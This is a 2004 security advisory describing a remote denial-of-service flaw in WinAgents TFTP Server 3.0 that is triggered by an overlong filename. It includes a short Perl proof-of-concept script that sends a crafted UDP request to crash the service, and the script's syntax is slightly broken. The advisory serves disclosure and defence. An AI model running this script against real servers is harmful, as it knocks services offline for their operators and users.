WinAgentsTFTP.txt

`WinAgents TFTP Server Long File Remote Denial Of Service Vulnerability  
  
  
Date: 10 June 2004  
Security Alert ID: 1008084  
Added by: HH  
  
Description:  
A vulnerability in WinAgents TFTP Server has been reported, allowing a remote user to cause the TFTP service to crash.  
  
It is reported that a remote user can request a file with a long filename (1000 characters) to cause the TFTP server to crash  
  
  
Affected:  
TFTP Server version 3.0.  
  
  
Proof Of Concept:  
#!/usr/bin/perl  
#  
# Remote D.O.S WinAgents TFTP Server ver 3.0  
#  
# Tftp.pl <Host>  
  
use IO::Socket;  
  
$Tftp_Port = "69";  
$FileName = "A"x1000;  
$Tftp_OP = "\x00\x01";  
$Tftp_M = "bin";  
$Buf = $Tftp_OP . $Tftp_M . $FileName ;  
  
if(!($ARGV[0]))  
  
print "\nUsage: perl $0 <Host>\n" ;  
  
exit;  
  
print "\nRemote D.O.S WinAgents TFTP Server ver 3.0 PoC\n\n\n";  
  
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket Error ...\n"  
;  
$ipaddr = inet_aton($ARGV[0]);  
$portaddr = sockaddr_in($Tftp_Port, $ipaddr);  
send($socket, $Buf, 0, $portaddr) == length($Buf) or die "Error : Can't send ...\n";  
print "Server : $ARGV[0] Is Down ... \n";  
  
  
Solution:  
The vendor was notified on June 7 2004, stating a fix will be released shortly.  
  
  
Credits:  
Ziv Kamir, Global Security Solution IT.  
  
`